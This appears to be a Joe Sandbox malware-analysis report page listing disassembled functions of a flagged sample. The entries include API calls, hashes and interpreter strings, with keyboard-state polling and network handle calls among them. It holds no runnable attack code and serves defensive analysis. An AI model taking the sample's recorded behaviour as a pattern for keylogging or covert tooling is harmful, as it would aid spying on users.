Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID:
API String ID: 3447465555-0
Opcode ID: 82cac82b4b039d721ebd372b91b2fc62c7167b7f5aa92ea9fe00795f8c88c50d
Instruction ID: 8e76bd2dd4f9f291d4d0d2f024e49a107acbfb13b70f6af2feded488394fcb7d
Opcode Fuzzy Hash: 82cac82b4b039d721ebd372b91b2fc62c7167b7f5aa92ea9fe00795f8c88c50d
Instruction Fuzzy Hash: DA01473840060876CF987B52E816FAE3768DB4072CB64802FFC4582251EBBDBDC0C65D

Function 00417828 Relevance: 1.6, APIs: 1, Instructions: 109
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,0000000B,00000064,Function_00003AA0), ref: 0041785E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 0c5c288b52653e33c99700036e1b6671b9120fb0b14425aa6a58d8b90c20a25b
Instruction ID: f2fef80f5dac5b6fca77381498cb524172e67638921a2825340b8f63c1e3bb0c
Opcode Fuzzy Hash: 0c5c288b52653e33c99700036e1b6671b9120fb0b14425aa6a58d8b90c20a25b
Instruction Fuzzy Hash: E34194B1A043849FFB21DB66DC84BD63FA4AB06708F14457AE9054B2D1C3BE58C8CB5A

Function 004177FE Relevance: 1.6, APIs: 1, Instructions: 78
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,0000000E), ref: 00417806

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 96a35d45d6eb71b063a041cab36e7b632606879b3f920d4ae54e27a0f5deffba
Instruction ID: 44e9ed7e008b15cc1c6daa826ff71a545a0a407927cab59c4865cc4465e9ad1e
Opcode Fuzzy Hash: 96a35d45d6eb71b063a041cab36e7b632606879b3f920d4ae54e27a0f5deffba
Instruction Fuzzy Hash: 153194B06142888FEB20EF15DC84BDA37A5AB06318F50853AE9055B291C3BD98C9CB1E

Function 00452C2A Relevance: 1.6, APIs: 1, Instructions: 56networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET ref: 00452D13

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: fb93063b2c22c002fb80d2f54494d8979d8cb793821a9b31983ca09de69da3ee
Instruction ID: 0b79c9d8ee523e5d61aded2f12dea3a4f4a6f262b2f8f46f1dc326f4e931b5bd
Opcode Fuzzy Hash: fb93063b2c22c002fb80d2f54494d8979d8cb793821a9b31983ca09de69da3ee
Instruction Fuzzy Hash: 0801F9B360021426D120B6659C81E7F77AC9BD5751F004A2FF94096242DA6DD84D87B7

Function 0048A8CA Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__fclose_nolock.LIBCMT ref: 0048A91C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fclose_nolock
String ID:
API String ID: 4232755567-0
Opcode ID: fa62614896d66da1dd26017a8330e2967346ed3d1043379608f11b230a10fff6
Instruction ID: 523772c1660711e2653affc8d838e345ad97d614df47247b7643438ab1492870
Opcode Fuzzy Hash: fa62614896d66da1dd26017a8330e2967346ed3d1043379608f11b230a10fff6
Instruction Fuzzy Hash: 53F096708057059AE710BB7A8802B9E7BE06F01338F218E4FE435A61D1CBBC96019F6E

Function 0040A7AF Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(?), ref: 0040A7C5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: HookUnhookWindows
String ID:
API String ID: 2953937349-0
Opcode ID: c2f65461762fedacb418b1d8725846156acba3c11a75af432081e5654a2fafc3
Instruction ID: 17f21fd734b90191041cfd2b5cfb3013198c7bcfded78644c7d095376c132e83
Opcode Fuzzy Hash: c2f65461762fedacb418b1d8725846156acba3c11a75af432081e5654a2fafc3
Instruction Fuzzy Hash: ABE08C312003029BDB08BBB19E5AB1B2294AB95700F84483DA502A72C2CA79D801C26E

Function 004885BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 004885CA

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _doexit
String ID:
API String ID: 1975234786-0
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: b912f901dcd9f85e22f50b672c951adb2dbfb290206ed51038e48ec04a2ac109
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: 3EB0923258020C33DA203682AC03F1A3A0997C1F64E640025BA0C195A1AAA2A9618189

Function 0048A675 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 0048A682

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: fb988ef1ed282cde7055c67e871ebe32d26cb63740a8571da473e386781d1f6d
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 26C09B7244010CB7DF112943DC02E493F1997C0764F044011FB1C1916197B7D5759689

Non-executed Functions

Function 004181C0 Relevance: 139.2, APIs: 29, Strings: 49, Instructions: 2733COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00418257
__fassign.LIBCMT ref: 004182AA
__fassign.LIBCMT ref: 0041831B
_memmove.LIBCMT ref: 0041834E
__fassign.LIBCMT ref: 004183AA
_memmove.LIBCMT ref: 0041846D
__fassign.LIBCMT ref: 00418513

Strings

Continuation section too long., xrefs: 0041A1B2, 0041A385
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout., xrefs: 00419AD5
%s::, xrefs: 00419F94
and, xrefs: 0041877F
Not a valid method, class or property definition., xrefs: 0041A1F8, 0041A205, 0041A25F
Get, xrefs: 00418E8B
IfWin should be #IfWin., xrefs: 0041A2A4
?*- , xrefs: 0041866E
Hotkeys/hotstrings are not allowed inside functions., xrefs: 0041A280
Duplicate label., xrefs: 00419C5A
@, xrefs: 004195DA
RTrim, xrefs: 0041897A
%s up::, xrefs: 0041A0A2
Join, xrefs: 00418865
Missing "}", xrefs: 0041A3C2, 0041A428
{Blind}%s%s{%s DownR}, xrefs: 0041A061
<>=/|^,:.+-*&!?~, xrefs: 00418606
{Blind}{%s Up}, xrefs: 0041A136
Missing "{", xrefs: 0041A1D1, 0041A1F1, 0041A3C9, 0041A3D6
This hotstring is missing its abbreviation., xrefs: 0041A2BE
%`2, xrefs: 00418AF6
OnClipboardChange, xrefs: 00419E94
Duplicate hotkey., xrefs: 0041A2FA
%s%s%s, xrefs: 004196D0
<>=/|^,:, xrefs: 004187C1
LTrim, xrefs: 0041895B
Out of memory., xrefs: 00419C8E, 00419E7D, 0041A322
Invalid single-line hotkey/hotstring., xrefs: 004198E9, 0041A2D8
AltTabMenu, xrefs: 00419975
AltTabAndMenu, xrefs: 00419991
{RCtrl up}, xrefs: 0041A047, 0041A060
Missing ")", xrefs: 0041A366
This line does not contain a recognized action., xrefs: 0041A343
AltTabMenuDismiss, xrefs: 004199AA
& , xrefs: 004186C1, 0041961D
Default, xrefs: 00419B74
Return, xrefs: 004197AC
@I, xrefs: 004196AA
Set, xrefs: 00418E9F
#CommentFlag, xrefs: 00418296
Static, xrefs: 004190BA
ShiftAltTab, xrefs: 00419959
XI, xrefs: 004196C4
Functions cannot contain functions., xrefs: 0041A222
{LCtrl up}, xrefs: 0041A04E
AltTab, xrefs: 0041993D
Not a valid property getter/setter., xrefs: 0041A247
@, xrefs: 004194B1
if not GetKeyState("%s"), xrefs: 00419FF4

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$_memmove
String ID: & $#CommentFlag$%`2$%s up::$%s%s%s$%s::$<>=/|^,:$<>=/|^,:.+-*&!?~$?*- $@$@$@I$AltTab$AltTabAndMenu$AltTabMenu$AltTabMenuDismiss$Continuation section too long.$Default$Duplicate hotkey.$Duplicate label.$Functions cannot contain functions.$Get$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Invalid single-line hotkey/hotstring.$Join$LTrim$Missing ")"$Missing "{"$Missing "}"$Not a valid method, class or property definition.$Not a valid property getter/setter.$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$OnClipboardChange$Out of memory.$RTrim$Return$Set$ShiftAltTab$Static$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$XI$and$if not GetKeyState("%s")${Blind}%s%s{%s DownR}${Blind}{%s Up}${LCtrl up}${RCtrl up}
API String ID: 3294318541-239435178
Opcode ID: 1918a08c192eac61c3c8517d1ba2d5601d71db58074a4fdbe2c8945f5ba84406
Instruction ID: b4e98e23cb8d6a4f1bbbb9c0283b9602871af0930da09b03ef632ee40f596985
Opcode Fuzzy Hash: 1918a08c192eac61c3c8517d1ba2d5601d71db58074a4fdbe2c8945f5ba84406
Instruction Fuzzy Hash: 232318715083819BDB219B2488507EBBBD1AB96304F18096FE8C557382E77D9CCAC79F

Function 0041BF10 Relevance: 110.7, APIs: 14, Strings: 48, Instructions: 2248COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0041BFC3
__fassign.LIBCMT ref: 0041C00E
__fassign.LIBCMT ref: 0041C02F

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

Strings

Local, xrefs: 0041C008
, =:, xrefs: 0041C160
contains, xrefs: 0041C916, 0041CAB7
Missing ":", xrefs: 0041D161, 0041D189
F, xrefs: 0041C5C2
, xrefs: 0041CA71
WHILE, xrefs: 0041C68B
Parameter #1 required, xrefs: 0041DB64
, xrefs: 0041C99F
and, xrefs: 0041C828, 0041C870
, xrefs: 0041C928
, xrefs: 0041CA43
Global variables must not be declared in this function., xrefs: 0041C108
, xrefs: 0041CACD
Duplicate declaration., xrefs: 0041C52A
This line does not contain a recognized action., xrefs: 0041C56F, 0041C605, 0041D046, 0041D050
, xrefs: 0041C8F5
Default, xrefs: 0041CF61
(<>, xrefs: 0041C729
:=+-, xrefs: 0041C731
"%s" requires that parameter #%u be non-blank., xrefs: 0041D7B8
<>=/|^,:*&~!()[]{}+-?.", xrefs: 0041CD32, 0041CE1F, 0041CF13
, xrefs: 0041CA9A
BETWEEN requires the word AND., xrefs: 0041C88B
t, xrefs: 0041D773
Too many declarations., xrefs: 0041C553
"%s" requires at least %d parameter%s., xrefs: 0041D735
:+-*/|&^., xrefs: 0041CCAC
Syntax error or too many variables in "For" statement., xrefs: 0041D525
PI, xrefs: 0041D724
Local variables must not be declared in this function., xrefs: 0041C127
ErrorLevel, xrefs: 0041C2BD
This "For" is missing its "in"., xrefs: 0041D4DD
Static, xrefs: 0041C029
/<>, xrefs: 0041CCCB
new, xrefs: 0041D012
not, xrefs: 0041C983, 0041CA1B
Parameters must not be declared., xrefs: 0041C50F
%`2, xrefs: 0041D331, 0041D42C
*/!~, xrefs: 0041C739
Global, xrefs: 0041BFBD
Not, xrefs: 0041C786
, xrefs: 0041C720
Built-in variables must not be declared., xrefs: 0041C58B
&|^[, xrefs: 0041C741
Invalid hotkey., xrefs: 0041D03F
between, xrefs: 0041C8E3, 0041CA88
Declaration conflicts with existing var., xrefs: 0041C531, 0041C53B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$__mbsnbicmp_l
String ID: $ <>=/|^,:*&~!()[]{}+-?."$ $ $ $ $ $ $ $"%s" requires at least %d parameter%s.$"%s" requires that parameter #%u be non-blank.$%`2$&|^[$(<>$*/!~$, =:$/<>$:+-*/|&^.$:=+-$BETWEEN requires the word AND.$Built-in variables must not be declared.$Declaration conflicts with existing var.$Default$Duplicate declaration.$ErrorLevel$F$Global$Global variables must not be declared in this function.$Invalid hotkey.$Local$Local variables must not be declared in this function.$Missing ":"$Not$Parameter #1 required$Parameters must not be declared.$PI$Static$Syntax error or too many variables in "For" statement.$This "For" is missing its "in".$This line does not contain a recognized action.$Too many declarations.$WHILE$and$between$contains$new$not$t
API String ID: 512136564-769437134
Opcode ID: 960a5685099fda7a0054e0d3ebb1b830a1aababef764e91fdac075ccb69281a3
Instruction ID: 488c8ba0b8705dc58050b49c2e4c3729e4a1e5079068a30ccd4d1cc83a19b57e
Opcode Fuzzy Hash: 960a5685099fda7a0054e0d3ebb1b830a1aababef764e91fdac075ccb69281a3
Instruction Fuzzy Hash: 1F03177194C3859ADB318A2888807FBBBD1AB96304F18456FE4C947382D77D98C6C79F

Function 0040F65D Relevance: 64.1, APIs: 27, Strings: 9, Instructions: 1093COMMON

Download Yara Rule

Strings

Down, xrefs: 0040F962, 0040FB26
@, xrefs: 0041036F
ASC , xrefs: 0040FE77
Click, xrefs: 0040F9AC
Temp, xrefs: 0040FB3D
Text, xrefs: 0040FA8A
^+!#{}, xrefs: 0040F878
0, xrefs: 0040FFAB
Raw, xrefs: 0040FA64

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0$@$ASC $Click$Down$Raw$Temp$Text$^+!#{}
API String ID: 0-4112994212
Opcode ID: 7feb64b9de04ed7ca193977d525903f883977b7f04ad87e0e5328ab1f603dde1
Instruction ID: df2906947eec868ff8e860874388c1215aa073617704c459d26ee2319de22b09
Opcode Fuzzy Hash: 7feb64b9de04ed7ca193977d525903f883977b7f04ad87e0e5328ab1f603dde1
Instruction Fuzzy Hash: 88822C71904289AADF21DB64D8417EF7FB15F16304F18407BE8916B3C2D2BC99C9CB6A

Function 0041FAF0 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 885COMMON

Download Yara Rule

APIs

Part of subcall function 00488EC1: __mbschr_l.LIBCMT ref: 00488ECE

__snprintf.LIBCMT ref: 0041FB44

Strings

Parameter default required., xrefs: 0042057B
Function name too long., xrefs: 0041FC54
, :=*), xrefs: 0041FE90, 0041FF30
Out of memory., xrefs: 0041FD15, 0041FD62, 004203A1
this, xrefs: 0041FDDF
Too many params., xrefs: 004202C0
false, xrefs: 0042016D
Invalid function declaration., xrefs: 0042035C
Unsupported parameter default., xrefs: 00420560
Expected ":=", xrefs: 00420519
Missing ")", xrefs: 0041FEB3, 0041FF5A, 0042032A
Missing close-quote, xrefs: 0042053A
Blank parameter, xrefs: 004202E6, 004205A3
Missing comma, xrefs: 00420278
%s.%s, xrefs: 0041FB31
ByRef, xrefs: 0041FEED
, =), xrefs: 0042012D
Duplicate declaration., xrefs: 0041FB86
value, xrefs: 0041FE2F
true, xrefs: 004201A8
A label must not point to a function., xrefs: 004204B8
Duplicate parameter., xrefs: 004202FE
Duplicate function definition., xrefs: 0041FBFB
Parameters of hotkey functions must be optional., xrefs: 004204E1

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __mbschr_l__snprintf
String ID: %s.%s$, :=*)$, =)$A label must not point to a function.$Blank parameter$ByRef$Duplicate declaration.$Duplicate function definition.$Duplicate parameter.$Expected ":="$Function name too long.$Invalid function declaration.$Missing ")"$Missing close-quote$Missing comma$Out of memory.$Parameter default required.$Parameters of hotkey functions must be optional.$Too many params.$Unsupported parameter default.$false$this$true$value
API String ID: 2744105689-1825772190
Opcode ID: 3f615d3d23ef6a498aa18c4357dad79db665935aae6056563b06d2dfea2709f0
Instruction ID: a860afa1ea8c5c8fee919ed7711a6b5d0fcd6584c4dd0e2694ea56bb68ff5277
Opcode Fuzzy Hash: 3f615d3d23ef6a498aa18c4357dad79db665935aae6056563b06d2dfea2709f0
Instruction Fuzzy Hash: 716247313042519BD720DF24E840BFBB7E1AB85314F94457FE9858B353D63E984ACBAA

Function 004105E0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 293keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(000000A0), ref: 004106E8
GetAsyncKeyState.USER32(000000A1), ref: 004106FE
GetAsyncKeyState.USER32(000000A2), ref: 00410714
GetAsyncKeyState.USER32(000000A3), ref: 0041072A
GetAsyncKeyState.USER32(000000A4), ref: 00410740
GetAsyncKeyState.USER32(000000A5), ref: 00410756
GetAsyncKeyState.USER32(0000005B), ref: 00410769
GetAsyncKeyState.USER32(0000005C), ref: 0041077C
GetAsyncKeyState.USER32(000000A0), ref: 004108B4
GetAsyncKeyState.USER32(000000A1), ref: 004108CA
GetAsyncKeyState.USER32(000000A2), ref: 004108E0
GetAsyncKeyState.USER32(000000A3), ref: 004108F6
GetAsyncKeyState.USER32(000000A4), ref: 0041090C
GetAsyncKeyState.USER32(000000A5), ref: 00410922
GetAsyncKeyState.USER32(0000005B), ref: 00410935
GetAsyncKeyState.USER32(0000005C), ref: 00410948

Strings

@, xrefs: 00410941
@, xrefs: 00410775

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
